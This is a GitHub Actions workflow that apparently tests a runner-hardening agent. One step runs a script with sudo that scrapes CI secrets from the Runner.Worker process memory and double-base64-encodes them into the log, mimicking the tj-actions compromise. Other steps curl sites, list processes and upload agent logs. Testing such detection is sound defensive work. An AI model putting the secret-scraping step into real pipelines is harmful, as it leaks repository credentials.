name: LockDown-Runner-Worker
on:
  workflow_dispatch:

jobs:
  build:
    name: Deploy2
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: prateek-stepsecurity/harden-runner@int
        with:
          egress-policy: audit
      - name: Code Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 2
          
      - name: Curl google
        run: "curl -s https://google.com"

      - name: Execute tj-action
        run: | 
          sudo python3 tj.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0
                  
      - name: Curl youtube
        run: "curl -s https://youtube.com"

      - run: sleep 2

      - run: ps auxf

      - run: pidof Runner.Worker


      - run: sudo journalctl -u agent
      
      - name: Compress agent log
        if: always()
        continue-on-error: true
        run: |
          gzip -c /home/agent/agent.log > agent-log-${{ runner.name }}.gz

      - name: Upload agent log
        if: always()
        continue-on-error: true
        uses: actions/upload-artifact@v4
        with:
          name: agent-log-${{ runner.name }}
          path: agent-log-${{ runner.name }}.gz
          compression-level: 0
          retention-days: 1
